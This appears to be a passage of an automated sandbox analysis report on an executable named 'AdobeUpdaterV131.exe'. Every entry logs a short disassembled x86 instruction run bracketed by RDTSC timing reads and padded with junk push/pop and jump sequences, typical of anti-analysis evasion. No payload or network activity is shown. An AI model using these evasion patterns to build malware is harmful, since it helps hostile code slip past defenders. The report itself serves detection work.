Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 940958 second address: 940988 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0D9C3DCh 0x00000008 jns 00007F09D0D9C3D6h 0x0000000e jmp 00007F09D0D9C3E6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jns 00007F09D0D9C3D6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90A593 second address: 90A59D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90A59D second address: 90A5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90A5A1 second address: 90A60C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F09D0731CA8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, 77CABA14h 0x0000002d lea eax, dword ptr [ebp+1247E31Fh] 0x00000033 add edx, dword ptr [ebp+122D1B14h] 0x00000039 nop 0x0000003a jc 00007F09D0731CB0h 0x00000040 pushad 0x00000041 jnl 00007F09D0731CA6h 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F09D0731CB3h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90A692 second address: 90A696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90A696 second address: 90A69C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90A69C second address: 90A6BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0D9C3E0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F09D0D9C3D8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90AD2A second address: 90AD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90AD7A second address: 90ADD7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0D9C3DCh 0x00000008 jno 00007F09D0D9C3D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], esi 0x00000013 push edi 0x00000014 xor ch, 00000056h 0x00000017 pop edi 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F09D0D9C3E4h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 jnl 00007F09D0D9C3D8h 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f pop edx 0x00000030 pushad 0x00000031 jmp 00007F09D0D9C3E9h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90B0CD second address: 90B0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 94145E second address: 941468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 947AC7 second address: 947AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 947ED1 second address: 947ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 947ED5 second address: 947EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F09D0731CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 947EE1 second address: 947EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 947EE7 second address: 947EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 947EEB second address: 947EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 948168 second address: 94816E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 948634 second address: 948638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 948638 second address: 948664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0731CB1h 0x00000012 ja 00007F09D0731CA8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 948664 second address: 94866C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9487D4 second address: 9487F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 948942 second address: 94894C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F09D0D9C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 94894C second address: 948966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F09D0731CB4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 948966 second address: 94896D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 948DEE second address: 948E07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 94E4E9 second address: 94E4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 94E687 second address: 94E68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 94E68F second address: 94E6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 94E6AD second address: 94E6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 951521 second address: 951525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 951525 second address: 951529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 951529 second address: 95155F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F09D0D9C3E2h 0x0000000d jmp 00007F09D0D9C3E0h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F09D0D9C3D6h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9517BA second address: 9517DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9517DB second address: 9517E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9517E1 second address: 9517E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9532FA second address: 953332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F09D0D9C3E9h 0x0000000b popad 0x0000000c jmp 00007F09D0D9C3E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 95957F second address: 959585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 958863 second address: 958875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F09D0D9C3D8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 958875 second address: 95887A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 958DA2 second address: 958DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F09D0D9C3D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 958DB1 second address: 958DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0731CB6h 0x00000013 jmp 00007F09D0731CB8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 958DED second address: 958E01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9590C2 second address: 9590CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9590CD second address: 9590E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F09D0D9C3E6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9590E9 second address: 959158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F09D0731CB5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F09D0731CB8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F09D0731CB9h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f jmp 00007F09D0731CABh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 959158 second address: 95917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F09D0D9C3EEh 0x0000000b jmp 00007F09D0D9C3E6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 95917B second address: 959180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 95DD2C second address: 95DD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F09D0D9C3D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 95DFE3 second address: 95DFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 jg 00007F09D0731CCCh 0x0000000c pushad 0x0000000d jne 00007F09D0731CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90B21B second address: 90B252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90B252 second address: 90B297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx edi, si 0x0000000d mov ebx, dword ptr [ebp+1247E35Eh] 0x00000013 mov edx, dword ptr [ebp+122D355Ch] 0x00000019 add eax, ebx 0x0000001b jns 00007F09D0731CABh 0x00000021 nop 0x00000022 jmp 00007F09D0731CACh 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a jnl 00007F09D0731CA6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90B297 second address: 90B29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90B29F second address: 90B2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 95E296 second address: 95E2AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F09D0D9C3DDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9619FC second address: 961A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 961A00 second address: 961A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 961C10 second address: 961C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 961C14 second address: 961C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 961C1A second address: 961C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 961C20 second address: 961C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 961C26 second address: 961C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 961C2C second address: 961C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96951D second address: 969525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 969525 second address: 969529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 969529 second address: 96952D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96A022 second address: 96A039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jl 00007F09D0D9C3E0h 0x0000000d jmp 00007F09D0D9C3DAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96A039 second address: 96A041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96A041 second address: 96A045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96A644 second address: 96A64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96A927 second address: 96A92D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96B1EC second address: 96B1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96CBC5 second address: 96CBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F09D0D9C3D6h 0x0000000b jns 00007F09D0D9C3D6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F09D0D9C3D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 96CBE1 second address: 96CBE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 971622 second address: 971627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 971627 second address: 97162D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97162D second address: 971631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 971631 second address: 97164D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F09D0731CA6h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 974AFD second address: 974B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 jmp 00007F09D0D9C3E6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 974F39 second address: 974F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9750E5 second address: 9750F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F09D0D9C3DCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9750F6 second address: 975100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F09D0731CA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 975100 second address: 975114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97528E second address: 97529C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97D89E second address: 97D8A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97D8A6 second address: 97D8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97DB3C second address: 97DB40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97DE28 second address: 97DE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97DFB0 second address: 97DFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
